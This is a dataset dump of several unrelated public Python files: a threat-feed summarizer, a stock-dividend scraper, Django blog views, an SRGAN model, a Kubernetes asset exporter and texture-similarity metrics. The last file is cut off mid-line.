self.verbose(self.get_config())\n return False\n\n return True\n\n def gather(self, count, row, match, enrichment_data):\n \"\"\"Re-sort all the enrichment data based on the specified column\"\"\"\n\n if not self.check_enrichment_data(enrichment_data):\n return (None, None)\n\n counter = Counter()\n for row in enrichment_data[self._enrichment_key]:\n if self._data_key in row:\n counter[row[self._data_key]] += 1\n\n return (self._output_key, dict(counter))\n","repo_name":"gawseed/threat-feed-tools","sub_path":"gawseed/threatfeed/enrichments/summarizer.py","file_name":"summarizer.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"73963017111","text":"try:\n\tfrom urllib.request import urlopen\nexcept:\n\tfrom urllib2 import urlopen\nfrom bs4 import BeautifulSoup as soup\nimport re, datetime, csv, time, random\n\ndef delay():\n\ttime.sleep(random.randint(10,20))\n\ndef get_page_soup(the_url):\n\tprint('try to get data from:', the_url)\n\tclient = urlopen(the_url, timeout=90)\n\tpage_html = client.read()\n\tclient.close()\n\tpage_soup = soup(page_html, 'html.parser')\n\treturn page_soup\n\t\ndef convert_date(date_str):\n\treturn datetime.datetime.strptime(date_str, '%Y-%m-%d')\n\ndef get_divend_data(code):\n\tthe_url = 'http://money.finance.sina.com.cn/corp/go.php/vISSUE_ShareBonus/stockid/' + code + '.phtml'\n\tpage_soup = get_page_soup(the_url)\n\tdata_body = page_soup.find_all('tbody')[0]\n\tdata = list()\n\torig = list()\n\tfor row in data_body.find_all('tr'):\n\t\tcols = row.find_all('td')\n\t\tif len(cols) == 1:\n\t\t\tcontinue\n\t\tpublic_date_str = cols[0].text.strip()\n\t\tregister_date_str = cols[6].text.strip()\n\t\tdivend_str = cols[3].text.strip()\n\t\tdata.append({'public':convert_date(public_date_str), \n\t\t\t\t\t 'register':convert_date(register_date_str) if register_date_str != '--' else convert_date(public_date_str),\n\t\t\t\t\t 'divend':float(divend_str)})\n\t\torig.append(cols)\n\treturn data, orig\n\ndef get_total_stock_data(code):\n\tthe_url = 'http://vip.stock.finance.sina.com.cn/corp/go.php/vCI_StockStructureHistory/stockid/' + code + '/stocktype/TotalStock.phtml'\n\tpage_soup = get_page_soup(the_url)\n\ttables = page_soup.find_all('table', id=re.compile('historyTable*'))\n\n\tdata = list()\n\torig = list()\n\tfor t in tables:\n\t\tfor row in t.find_all('tr'):\n\t\t\tcols = row.find_all('td')\n\t\t\tif len(cols) != 0:\n\t\t\t\tdate_str = cols[0].div.text.strip()\n\t\t\t\tcount_str = cols[1].div.text.strip()[:-2]\n\t\t\t\tdata.append({'date':convert_date(date_str), 'count':float(re.sub(r'[^0-9.]', '', count_str))})\n\t\t\t\torig.append(cols)\n\treturn data, orig\n\ndef get_total_stocks(date, stocks_data):\n\tcount = 0.0\n\tfor item in stocks_data:\n\t\tif date < item['date']:\n\t\t\tbreak\n\t\telse:\n\t\t\tcount = item['count']\n\treturn count\n\t\ndef get_divend(code):\n\tdivend_data, divend_orig = get_divend_data(code)\n\tdelay()\n\tstocks_data, stocks_orig = get_total_stock_data(code)\n\t\n\tcurrent_year = 0\n\tfor i in range(len(divend_data)-1, -1, -1):\n\t\trecord = divend_data[i]\n\t\treg_date = record['register']\n\t\t\n\t\tyear_in_record = reg_date.year\n\t\tif current_year == year_in_record:\n\t\t\trecord['year'] = year_in_record\n\t\telse:\n\t\t\trecord['year'] = year_in_record - 1\n\t\tcurrent_year = year_in_record\n\t\t\n\t\trecord['total'] = get_total_stocks(reg_date, stocks_data)\n\treturn divend_data, stocks_data\n\ndef load_AB_list(filename):\n\tfull_dict = {}\n\twith open(filename, encoding='UTF-8') as csvfile:\n\t\treader = csv.reader(csvfile)\n\t\tfor row in reader:\n\t\t\tkey = row[0]\n\t\t\tdata = {'code_a':row[1], 'name_a':row[2], 'code_b':row[3], 'name_b':row[4]}\n\t\t\tfull_dict[key] = data\n\treturn full_dict\n\t\ndef load_divend_done_list(filename):\n\tdone_set = set()\n\ttry:\n\t\twith open('no_record.txt') as afile:\n\t\t\tfor line in afile.readlines():\n\t\t\t\tkey = line.strip()\n\t\t\t\tif key not in done_set:\n\t\t\t\t\tdone_set.add(key)\n\texcept:\n\t\tpass\n\t\t\n\ttry:\n\t\twith open('divend.csv') as csvfile:\n\t\t\treader = csv.reader(csvfile)\n\t\t\tfor row in reader:\n\t\t\t\tkey = row[0]\n\t\t\t\tif key not in done_set:\n\t\t\t\t\tdone_set.add(key)\n\t\t\t\t\t#print('already had', key)\n\texcept:\n\t\tpass\n\treturn done_set\n\t\nif __name__ == '__main__':\n\tno_record_file = 'no_record.txt'\n\tdivend_csv = 'divend.csv'\n\tfull_dict = load_AB_list('full_list.csv')\n\tdone_set = load_divend_done_list(divend_csv)\n\ttotal = len(full_dict)\n\tdone = len(done_set)\n\tfor code in full_dict:\n\t\tif code in done_set:\n\t\t\tcontinue\n\t\ttry:\n\t\t\tdivend_data, stocks_data = get_divend(code)\n\t\texcept:\n\t\t\t# raise\n\t\t\tprint('Get data from the url failed')\n\t\t\tcontinue\n\t\tdone += 1\n\t\tif len(divend_data) > 0:\n\t\t\twith open(divend_csv, 'a') as outfile:\n\t\t\t\tfor record in divend_data:\n\t\t\t\t\ttext = '%s,%s,%s,%s,%s\\n' % (code, record['total'], record['divend'], record['year'], record['register'].date().isoformat())\n\t\t\t\t\toutfile.write(text)\n\t\telse:\n\t\t\twith open(no_record_file, 'a') as outfile:\n\t\t\t\toutput.write(code + '\\n')\n\t\tprint('Progress ... [%d/%d] done' % (done, total))\n\t\tdone_set.add(code)\n\t\tdelay()","repo_name":"jerrymarx/PythonFinanceStudy","sub_path":"scraping_divend/stock_info_sina_getter.py","file_name":"stock_info_sina_getter.py","file_ext":"py","file_size_in_byte":4140,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"29742760841","text":"import json\nfrom handlers.user import facebook, twitter, tumblr, flickr, px500, linkedin\n\nclass BaseProviderWrapper(object):\n # map used to format blob for UI templates\n provider_map = {\n 'facebook': facebook,\n 'twitter': twitter,\n 'tumblr': tumblr,\n 'flickr': flickr,\n '500px': px500,\n 'linkedin': linkedin,\n }\n\n @staticmethod\n def get_provider_from_link(link):\n p = link.split(':')[0]\n return p\n\n def add_link(self, link, raw, strip_token=True):\n \"\"\"\n adds a linked account with all sub accounts to \"accounts\" blob used by UI templates\n @param link: link key in format :\n @param raw: raw provider specific account data\n @return: True or False\n \"\"\"\n # get provider name\n p = self.get_provider_from_link(link)\n if not (p and p in self.provider_map.keys()):\n return None\n\n # load raw user data\n user_data = json.loads(raw) if raw else None\n if not user_data:\n return None\n\n # normalize user data\n account = self.provider_map[p].UserData.populate(user_data)\n if not account:\n return None\n\n if strip_token:\n account.pop('token', None)\n\n return account\n\n def is_token_refresh(self, provider):\n \"\"\"\n Returns true if token refresh is required for this provider\n @param provider:\n @return: True or False\n \"\"\"\n return self.provider_map[provider].UserData.is_token_refresh()\n\nclass ProviderWrapper(BaseProviderWrapper):\n # map used to format blob for UI templates\n short_provider_map = {\n 'facebook': 'fb',\n 'twitter': 'tw',\n 'tumblr': 'tr',\n 'flickr': 'fr',\n '500px': '5p',\n 'linkedin': 'in',\n }\n\n @staticmethod\n def get_long_provider_name(short_name):\n for ln, sn in ProviderWrapper.provider_map.iteritems():\n if sn == short_name:\n return ln.capitalize()\n\n # return same if not found\n return short_name\n\n def __init__(self, data, sources, include_unlinked=False):\n super(ProviderWrapper, self).__init__()\n\n self.data = data\n # pre populate destination accounts data structure passed to UI templates\n self.accounts = {k: list() for k in self.short_provider_map.values()}\n self.include_unlinked = include_unlinked\n self.sources = sources\n\n def purge_sources(self, account):\n \"\"\"\n Removes redundant sources from the accounts\n @param account: provider account, must have ['sources']\n @return:\n \"\"\"\n return set.intersection(set(account['sources']), self.sources)\n\n def get_accounts(self):\n return self.accounts\n\n def add_link(self, link, raw, strip_token=True):\n p = link.split(':')[0]\n if not (p and p in self.short_provider_map.keys()):\n return None\n\n h = self.short_provider_map[p]\n\n a = super(ProviderWrapper, self).add_link(link, raw)\n if not a:\n return None\n\n # fill accounts record with sources and options\n self.data.populate_provider_bag(p, a, a['id'])\n\n # remove empty sources unless special case\n if not self.include_unlinked:\n a['sources'] = list(self.purge_sources(a))\n\n # append the accounts list\n self.accounts[h].append(a)\n\n def populate_linked_accounts(self, gid):\n linked = self.data.get_linked_accounts(gid) or dict()\n for link, raw in linked.iteritems():\n self.add_link(link, raw)\n","repo_name":"mutabot/magenta","sub_path":"svc/handlers/provider_wrapper.py","file_name":"provider_wrapper.py","file_ext":"py","file_size_in_byte":3630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"44005162453","text":"import networkx as nx\nimport matplotlib.pyplot as plt\n\nvertices = range(1, 10)\nedges = [(7, 2), (2, 3), (7, 4), (4, 5), (7, 3), (7, 5), (1, 6), (1, 7), (2, 8), (2, 9)]\nG = nx.Graph()\nG.add_nodes_from(vertices)\nG.add_edges_from(edges)\nnx.draw(G, with_labels=True)\nplt.show()\n\nstopien_centralnosci = nx.degree_centrality(G)\nprint(stopien_centralnosci)\n\nposrednictwo = nx.betweenness_centrality(G)\nprint(posrednictwo)\n\nbliskosc = nx.closeness_centrality(G)\nprint(bliskosc)\n\ncentrality = nx.eigenvector_centrality(G)\nprint(centrality)\n\n","repo_name":"Kamil-Radzimowski/algorithms","sub_path":"chapter-2-graphs/indicator.py","file_name":"indicator.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"9569084504","text":"\n\nfrom django.shortcuts import redirect, render\nfrom django.contrib.auth import login ,logout , authenticate\n\n#forms\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom appblog.forms import *\n\nfrom appblog.models import *\n\n#log\n\nfrom django.contrib.auth.decorators import login_required\n\n\n\ndef sobre_mi(request):\n return render(request ,\"appblog/sobremi.html\")\n\ndef login_request(request):\n if request.method == \"POST\":\n formulario=AuthenticationForm(request, data= request.POST) \n if formulario.is_valid():\n data=formulario.cleaned_data\n nombre_user=data.get('username') \n contraseña= data.get('password')\n\n usuario= authenticate( username=nombre_user, password=contraseña) \n \n if usuario is not None: \n \n login(request, usuario) \n \n contexto={\"user\":usuario}\n \n return redirect(\"inicio\")\n else: \n contex= {\"errors\":[\"el usuario no existe\"]}\n return render (request, \"appblog/index.html\", contex)\n else:\n contex= {\"errors\":[\"revise los datos indicados\"]}\n return render (request, \"appblog/index.html\", contex)\n\n else:\n form= AuthenticationForm()\n return render(request, \"appblog/login.html\",{\"form\":form})\n\n\ndef register(request):\n if request.method == \"POST\":\n form= registrousuario(request.POST)\n\n if form.is_valid():\n usuario=form.cleaned_data.get(\"username\")\n print(usuario)\n form.save()\n \n return render(request, \"appblog/index.html\")\n \n else:\n context={\"errors\": [\"no paso validaciones\"]}\n return render(request ,\"appblog/index.html\", context)\n else:\n form = registrousuario()\n return render (request , \"appblog/register.html\" ,{\"form\": form})\n\n \ndef inicio(request):\n \n if request.user.username:\n avatar = Avatar.objects.filter(usuario=request.user)\n\n if len(avatar) > 0:\n imagen = avatar[0].imagen.url\n else:\n imagen = None\n \n \n else:\n imagen = None\n dict_ctx = {\"title\": \"Inicio\", \"page\": \"Inicio\", \"imagen_url\": imagen}\n return render(request, \"appblog/index.html\", dict_ctx)\n \n \n\n@ login_required()\ndef cargar_imagen(request):\n\n if request.method == \"POST\":\n formulario= AvatarFormulario(request.POST,request.FILES)\n\n if formulario.is_valid():\n usuario1= request.user\n avatar= Avatar.objects.filter(usuario=usuario1)\n\n if len(avatar) > 0:\n avatar= avatar[0]\n avatar.imagen= formulario.cleaned_data[\"imagen\"]\n avatar.save()\n\n else:\n avatar = Avatar(usuario=usuario1, imagen=formulario.cleaned_data[\"imagen\"])\n avatar.save()\n \n return redirect(\"inicio\")\n else:\n\n formulario = AvatarFormulario()\n return render(request, \"appblog/cargar_imagen.html\", {\"form\": formulario})\n\n\n\n \n\n@login_required()\ndef actualizar_usuario(request):\n return render(request, \"appblog/editar_usuario.html\")\n\n\n\n\n\n@login_required()\ndef actualizar_usuario(request):\n \n usuario= request.user\n\n if request.method == \"POST\":\n formulario= UsuarioEditForm(request.POST) \n\n if formulario.is_valid():\n \n data= formulario.cleaned_data\n\n usuario.email= data[\"email\"]\n usuario.password1= data[\"password1\"]\n usuario.password2= data[\"password2\"]\n usuario.first_name= data[\"first_name\"]\n usuario.last_name= data[\"last_name\"]\n \n\n usuario.save()\n\n return redirect(\"inicio\")\n \n else:\n formulario= UsuarioEditForm(initial={\"email\": usuario.email, \"first_name\": usuario.first_name ,\"last_name\": usuario.last_name}) \n return render(request, \"appblog/editar_usuario.html\", {\"form\": formulario, \"errors\": [\"Datos o formato invalidos\"]})\n\n else:\n formulario= UsuarioEditForm(initial={\"email\": usuario.email, \"first_name\": usuario.first_name ,\"last_name\": usuario.last_name}) \n return render(request, \"appblog/editar_usuario.html\", {\"form\": formulario})\n\n\n\n\n\n\n","repo_name":"nicoymas/proyectoblog","sub_path":"appblog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11106489351","text":"\nimport torch\nimport torch.nn as nn\nimport numpy as np\n\ndef get_activation(name, inplace=True):\n if name == 'relu': return nn.ReLU(inplace)\n if name == 'lrelu': return nn.LeakyReLU(0.2, inplace=inplace)\n if name == 'prelu': return nn.PReLU()\n if name == 'sigmoid': return nn.Sigmoid()\n if name == 'tanh': return nn.Tanh()\n\ndef get_normalization(name, channels):\n if name == 'bn': return nn.BatchNorm2d(channels)\n if name == 'in': return nn.InstanceNorm2d(channels)\n\ndef _support_sn(sn, layer):\n if sn: return nn.utils.spectral_norm(layer)\n return layer\n\ndef Conv2d(sn, *args, **kwargs):\n layer = nn.Conv2d(*args, **kwargs)\n return _support_sn(sn, layer)\ndef Linear(sn, *args, **kwargs):\n layer = nn.Linear(*args, **kwargs)\n return _support_sn(sn, layer)\ndef ConvTranspose2d(sn, *args, **kwargs):\n layer = nn.ConvTranspose2d(*args, **kwargs)\n return _support_sn(sn, layer)\n\nclass Res(nn.Module):\n def __init__(self, module):\n super().__init__()\n self.module = module\n def forward(self, x):\n h = self.module(x)\n return (h + x) / np.sqrt(2)\n\nclass Block(nn.Module):\n def __init__(self,\n channels,\n sn=True, bias=True, norm_name='in', act_name='prelu'\n ):\n super().__init__()\n self.block = nn.Sequential(\n get_normalization(norm_name, channels),\n get_activation(act_name),\n Conv2d(sn, channels, channels, 3, 1, 1, bias=bias),\n get_normalization(norm_name, channels),\n get_activation(act_name),\n Conv2d(sn, channels, channels, 3, 1, 1, bias=bias)\n )\n def forward(self, x):\n return self.block(x)\n\nclass Up(nn.Module):\n def __init__(self,\n in_channels, out_channels,\n sn=True, bias=True, act_name='prelu'\n ):\n super().__init__()\n self.up = nn.Sequential(\n get_activation(act_name),\n Conv2d(sn, in_channels, out_channels*4, 3, 1, 1, bias=bias),\n nn.PixelShuffle(2)\n )\n def forward(self, x):\n return self.up(x)\n\nclass Generator(nn.Module):\n def __init__(self,\n scale, image_channels=3, channels=64, num_blocks=5,\n sn=True, bias=True, norm_name='in', act_name='prelu'\n ):\n super().__init__()\n num_ups = int(np.log2(scale))\n\n self.input = Conv2d(\n sn, image_channels, channels, 7, 1, 3\n )\n blocks = []\n for _ in range(num_blocks):\n blocks.append(\n Res(Block(\n channels, sn, bias,\n norm_name, act_name\n ))\n )\n blocks.extend([\n get_normalization(norm_name, channels),\n get_activation(act_name),\n Conv2d(sn, channels, channels, 3, 1, 1, bias=bias)\n ])\n self.res_blocks = Res(\n nn.Sequential(*blocks)\n )\n ups = []\n for _ in range(num_ups):\n ups.append(\n Up(\n channels, channels,\n sn, bias, act_name\n )\n )\n self.ups = nn.Sequential(*ups)\n self.output = nn.Sequential(\n get_activation(act_name),\n Conv2d(sn, channels, image_channels, 7, 1, 3, bias=bias),\n get_activation('tanh')\n )\n def forward(self, x):\n x = self.input(x)\n x = self.res_blocks(x)\n x = self.ups(x)\n x = self.output(x)\n return x\n\nclass SingleScaleDiscriminator(nn.Module):\n def __init__(self,\n in_channels, num_layers=3, channels=32,\n sn=True, bias=True, norm_name='in', act_name='lrelu', \n ):\n super().__init__()\n\n ochannels = channels\n layers = [\n nn.Sequential(\n Conv2d(sn, in_channels, ochannels, 4, 2, 1, bias=bias),\n get_activation(act_name)\n )\n ]\n for _ in range(num_layers):\n layers.append(\n nn.Sequential(\n Conv2d(sn, channels, channels*2, 4, 2, 1, bias=bias),\n get_normalization(norm_name, channels*2),\n get_activation(act_name)\n )\n )\n channels *= 2\n layers.append(\n Conv2d(sn, channels, 1, 4, 1, 1, bias=bias)\n )\n self.disc = nn.ModuleList(layers)\n def forward(self, x):\n out = []\n for module in self.disc:\n x = module(x)\n out.append(x)\n return out[-1], out[:-1]\n\nclass Discriminator(nn.ModuleList):\n def __init__(self,\n in_channels=3, num_scale=2, num_layers=3, channels=32,\n sn=True, bias=True, norm_name='in', act_name='lrelu'\n ):\n super().__init__()\n\n self.discs = nn.ModuleList()\n for _ in range(num_scale):\n self.discs.append(\n SingleScaleDiscriminator(\n in_channels, num_layers, channels,\n sn, bias, norm_name, act_name\n )\n )\n self.down = nn.AvgPool2d(2)\n def forward(self, x):\n out = []\n for module in self.discs:\n out.append(module(x))\n x = self.down(x)\n return out\n\ndef init_weight_N002(m):\n if isinstance(m, nn.Conv2d):\n m.weight.data.normal_(0, 0.02)\n if not m.bias == None:\n m.bias.data.fill_(0.)\n elif isinstance(m, nn.BatchNorm2d):\n if not m.weight == None:\n m.weight.data.fill_(1.)\n m.bias.data.fill_(0.)\n\ndef init_weight_xavier(m):\n if isinstance(m, nn.Conv2d):\n nn.init.xavier_normal_(m.weight)\n if not m.bias == None:\n m.bias.data.fill_(0.)\n elif isinstance(m, nn.BatchNorm2d):\n if not m.weight == None:\n m.weight.data.fill_(1.)\n m.bias.data.fill_(0.)\n\ndef init_weight_kaiming(m):\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight)\n if not m.bias == None:\n m.bias.data.fill_(0.)\n elif isinstance(m, nn.BatchNorm2d):\n if not m.weight == None:\n m.weight.data.fill_(1.)\n m.bias.data.fill_(0.)","repo_name":"STomoya/animeface","sub_path":"implementations/SRGAN/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6162,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"5"} +{"seq_id":"19249404581","text":"import time\nimport logging\nfrom kubernetes import client, config\nfrom pprint import pprint\nimport yaml\nimport os\nimport requests, json\nimport warnings\nimport urllib3, urllib \nfrom urllib3.exceptions import InsecureRequestWarning\n\nconfig.load_incluster_config()\n\nv1 = client.CoreV1Api()\n\nKUBE_LABEL_SELECTOR = os.environ[\"LABEL_SELECTOR\"]\nKUBE_ANNOTATION_ASSET_IDENTIFIER = \"asset-repository/asset.identifier\"\nKUBE_ANNOTATION_VERSION = \"asset-repository/version\"\nKUBE_ANNOTATION_CONTAINERS = \"asset-repository/container-instances\"\n\n\ndef extractContainerInfos(container, baseIdentifier, commonAttributes, annotations):\n info = dict()\n\n image = container.image\n imageVersion = image.split(':')\n if imageVersion[1]:\n info[\"version\"] = imageVersion[1]\n else:\n info[\"version\"] = image\n\n info[\"name\"] = container.name\n info[\"identifier\"] = baseIdentifier + \"-\" + container.name\n info[\"attributes\"] = commonAttributes\n\n container_asset_identifier = KUBE_ANNOTATION_ASSET_IDENTIFIER + \".\" + container.name\n\n # Asset: use annotation container-specific\n if container_asset_identifier in annotations:\n info[\"asset\"] = dict()\n info[\"asset\"][\"identifier\"] = annotations[container_asset_identifier]\n elif KUBE_ANNOTATION_ASSET_IDENTIFIER in annotations:\n info[\"asset\"] = dict()\n info[\"asset\"][\"identifier\"] = annotations[KUBE_ANNOTATION_ASSET_IDENTIFIER]\n\n return info\n\n\ndef kube():\n instances = []\n\n pods = v1.list_pod_for_all_namespaces(watch=False, label_selector=KUBE_LABEL_SELECTOR)\n\n for pod in pods.items:\n namespace = pod.metadata.namespace\n nodeName = pod.spec.node_name\n podName = pod.metadata.name\n annotations = pod.metadata.annotations\n\n commonAttributes = dict()\n commonAttributes[\"pod\"] = podName\n commonAttributes[\"node\"] = nodeName\n commonAttributes[\"namespace\"] = namespace\n\n baseIdentifier = namespace + \"-\" + podName\n\n if not annotations:\n annotations = dict()\n\n # If containers to check are identified in annotations\n if KUBE_ANNOTATION_CONTAINERS in annotations:\n trackedContainerName = annotations[KUBE_ANNOTATION_CONTAINERS].split(\",\")\n for container in pod.spec.containers:\n if container.name in trackedContainerName:\n containerInstance = extractContainerInfos(container, baseIdentifier, commonAttributes, annotations)\n instances.append(containerInstance)\n else:\n for container in pod.spec.containers:\n containerInstance = extractContainerInfos(container, baseIdentifier, commonAttributes, annotations)\n instances.append(containerInstance)\n \n return instances\n\nwhile True:\n instances = kube()\n \n warnings.simplefilter('ignore',InsecureRequestWarning)\n\n headers = {\n 'Content-type': 'application/json',\n }\n \n json_data = {\n 'instances': instances,\n }\n\n try:\n response = requests.put(os.environ[\"ASSET_REPOSITORY_URL\"] + \"/sources/\" + os.environ[\"SOURCE_IDENTIFIER\"] + \"/instances\", headers=headers, json=json_data, verify=False)\n response.raise_for_status()\n except requests.exceptions.HTTPError as e:\n raise SystemExit(e)\n except requests.exceptions.RequestException as e: # This is the correct syntax\n raise SystemExit(e)\n\n time.sleep(int(os.environ[\"SLEEP\"]))\n","repo_name":"beerfranz/asset-repository-kube-exporter","sub_path":"src/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24632713281","text":"import clr\nimport time\nimport os\nimport platform\nimport fnmatch\nimport shutil\nfrom xml.etree import ElementTree as ET\nfrom xml.etree.ElementTree import fromstring\nfrom xml.etree.ElementTree import Element\n\nclr.AddReference(\"System\")\nfrom System.Text import *\nfrom System.IO import *\n\nclass log():\n\tdef __init__(self, path):\n\t\tself.path = path\n\t\tif path != '':\n\t\t\tlog_file = open(self.path, 'w')\n\n\tdef write(self, text, result):\n\t\tif result == 0:\n\t\t\tresult = 'done'\n\t\telif result == 1:\n\t\t\tresult = 'none'\n\t\tlog_current_time = time.strftime('%Y-%m-%d-%H:%M:%S',time.localtime(time.time()))\n\t\tstream_writer = StreamWriter(self.path, True);\n\t\ttext = log_current_time + \" >> \" + text + ': ' + result.ToString();\n\t\tprint(text);\n\t\tstream_writer.WriteLine(text);\n\t\tstream_writer.Close();\n\t\t# log_current_time = time.strftime('%Y-%m-%d-%H:%M:%S',time.localtime(time.time()))\n\t\t# log_file = open(self.path, 'a')\n\t\t# text = log_current_time + ' >> ' + text + ': ' + str(result) + '\\n'\n\t\t# print text\n\t\t# log_file.write(text)\n\t\t# log_file.close()\n\nclass case_info():\n\tdef __init__(self, result_file_path = '', iterate_num = 0, case_id = '', \n\t\tresult = 0, comments = '', run_time = 0):\n\t\tself.iterate_num = iterate_num\n\t\tself.case_id = case_id\n\t\tself.result = result\n\t\tself.comments = comments\n\t\tself.run_time = run_time\n\t\tself.result_file_path = result_file_path","repo_name":"shonwang/auto_click","sub_path":"library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31555137575","text":"import numpy as np\n\nimport cv2\nimport os\n\nfrom abc import ABC, abstractmethod\nfrom collections import Counter\nfrom numpy.linalg import inv\nfrom scipy.stats import entropy\n\nfrom scipy.spatial.distance import mahalanobis\nfrom skimage import color\nfrom skimage.feature import local_binary_pattern\n\nfrom sklearn.model_selection import StratifiedKFold\nfrom utils import filterbank, metric\n\n\ndef _filter_class_counts(image_dir, class_cnt, fold_cnt, scale_invariance=False):\n fold_cnt = min(fold_cnt, class_cnt)\n img_class_files = {}\n for root, dir, files in os.walk(image_dir):\n for fpath in files:\n img_class, scale = fpath.split(\"-\")\n if scale_invariance:\n scale = scale.split(\"_\", 3)[1]\n img_class = \".\".join([img_class, scale])\n if img_class not in img_class_files:\n img_class_files[img_class] = [os.path.join(root, fpath)]\n elif len(img_class_files[img_class]) < class_cnt or class_cnt == -1:\n img_class_files[img_class].append(os.path.join(root, fpath))\n img_classes = set(img_class_files.keys())\n for img_class in img_classes:\n if (len(img_class_files[img_class]) < fold_cnt) or (class_cnt > 0 and img_class in\n img_class_files and len(img_class_files[img_class]) < class_cnt):\n del img_class_files[img_class]\n print(\n f\"Filtered data to {len(img_class_files.keys())} classes of size {class_cnt}\")\n return img_class_files\n\n\nclass TextureFeature(ABC):\n def __init__(self, image_dir_or_saved_bin, class_cnt, save_features, scale_invariance=False,\n fold_cnt=5):\n self.labels, self.features = self.load_or_generate_features(\n image_dir_or_saved_bin, class_cnt, fold_cnt, scale_invariance, save_features)\n self.validator = StratifiedKFold(n_splits=fold_cnt, shuffle=True).split(\n self.features, self.labels)\n\n def load_or_generate_features(self, image_dir_or_saved_features, class_cnt, fold_cnt,\n scale_invariance, save_features):\n if os.path.isfile(image_dir_or_saved_features):\n return np.load(image_dir_or_saved_features)\n\n img_class_files = _filter_class_counts(\n image_dir_or_saved_features, class_cnt, fold_cnt, scale_invariance)\n img_labels, img_features = [], []\n for img_class, files in img_class_files.items():\n for fpath in files:\n single_feature = self.generate_feature(fpath)\n img_labels.append(img_class)\n img_features.append(single_feature)\n if save_features:\n np.savez(open(save_features, 'wb'), img_labels, img_features)\n return img_labels, img_features\n\n @abstractmethod\n def generate_feature(self, fpath):\n pass\n\n @abstractmethod\n def compute_similarity(self, feature_1, feature_2):\n pass\n\n\nclass Ssim(TextureFeature):\n def __init__(self, image_dir_or_saved_bin, class_cnt, save_features, scale_invariance,\n fold_cnt=5, k_range=(0.01, 0.03), L=255):\n self.k_range = k_range\n self.luminance = L\n self.c1 = (k_range[0] * L) ** 2\n self.c2 = (k_range[1] * L) ** 2\n tmp_window = metric.fspecial()\n self.window = tmp_window/tmp_window.sum()\n super().__init__(image_dir_or_saved_bin, class_cnt, save_features, scale_invariance,\n fold_cnt)\n\n def generate_feature(self, fpath):\n source_image = cv2.imread(fpath, cv2.IMREAD_GRAYSCALE)\n mu = metric.conv(source_image, self.window)\n sigma_squared = metric.conv(\n source_image * source_image, self.window) - mu ** 2\n return mu, sigma_squared, fpath\n\n def compute_similarity(self, feature_1, feature_2):\n img1 = cv2.imread(feature_1[2], cv2.IMREAD_GRAYSCALE).astype(float)\n img2 = cv2.imread(feature_2[2], cv2.IMREAD_GRAYSCALE).astype(float)\n sigma_12 = metric.conv(img1 * img2, self.window) - \\\n feature_1[0] * feature_2[0]\n ssim_map = ((2*feature_1[0] * feature_2[0] + self.c1) * (2*sigma_12 + self.c2)) / (\n (feature_1[0] ** 2 + feature_2[0] ** 2 + self.c1) *\n (feature_1[1] + feature_2[1] + self.c2))\n return ssim_map.mean()\n\n\nclass Stsim1(TextureFeature):\n def generate_feature(self, fpath):\n steerable_filter = filterbank.Steerable()\n source_image = cv2.imread(fpath, cv2.IMREAD_GRAYSCALE)\n steerable_pyramid = steerable_filter.getlist(\n steerable_filter.buildSCFpyr(source_image))\n return steerable_pyramid\n\n def compute_similarity(self, feature_1, feature_2):\n img1 = cv2.imread(feature_1[2], cv2.IMREAD_GRAYSCALE).astype(float)\n img2 = cv2.imread(feature_2[2], cv2.IMREAD_GRAYSCALE).astype(float)\n sigma_12 = metric.conv(img1 * img2, self.window) - \\\n feature_1[0] * feature_2[0]\n ssim_map = ((2*feature_1[0] * feature_2[0] + self.c1) * (2*sigma_12 + self.c2)) / (\n (feature_1[0] ** 2 + feature_2[0] ** 2 + self.c1) *\n (feature_1[1] + feature_2[1] + self.c2))\n return ssim_map.mean()\n\n\nclass Stsim1(TextureFeature):\n def generate_feature(self, fpath):\n steerable_filter = filterbank.Steerable()\n source_image = cv2.imread(fpath, cv2.IMREAD_GRAYSCALE)\n steerable_pyramid = steerable_filter.getlist(\n steerable_filter.buildSCFpyr(source_image))\n return steerable_pyramid\n\n def compute_similarity(self, feature_1, feature_2):\n np.mean([metric.pooling(feature_1[i], feature_2[i])\n for i in range(len(feature_1))])\n\n\nclass Stsim2(TextureFeature):\n def generate_feature(self, fpath):\n source_image = cv2.imread(fpath, cv2.IMREAD_GRAYSCALE)\n\n steerable_filter = filterbank.Steerable()\n steerable_pyramid = steerable_filter.getlist(\n steerable_filter.buildSCFpyr(source_image))\n\n steerable_filter_nosubbands = filterbank.SteerableNoSub()\n steerable_crossterms = steerable_filter_nosubbands.buildSCFpyr(\n source_image)\n return steerable_pyramid, steerable_crossterms\n\n def compute_similarity(self, feature_1, feature_2):\n # Base STSIM-1 pooled metrics\n stsim2 = [metric.pooling(feature_1[0][i], feature_2[0][i])\n for i in range(len(feature_1[0]))]\n\n # Across scale, same orientation\n for scale in range(2, len(feature_1[1]) - 1):\n for orient in range(len(feature_1[1][1])):\n im11 = np.abs(feature_1[1][scale - 1][orient])\n im12 = np.abs(feature_1[1][scale][orient])\n\n im21 = np.abs(feature_2[1][scale - 1][orient])\n im22 = np.abs(feature_2[1][scale][orient])\n stsim2.append(metric.compute_cross_term(\n im11, im12, im21, im22, 7).mean())\n\n # Across orientation, same scale\n for scale in range(2, len(feature_1[1]) - 1):\n for orient in range(len(feature_1[1][1])):\n im11 = np.abs(feature_1[1][scale][orient])\n im21 = np.abs(feature_2[1][scale][orient])\n\n for orient2 in range(orient + 1, len(feature_1[1][1])):\n im13 = 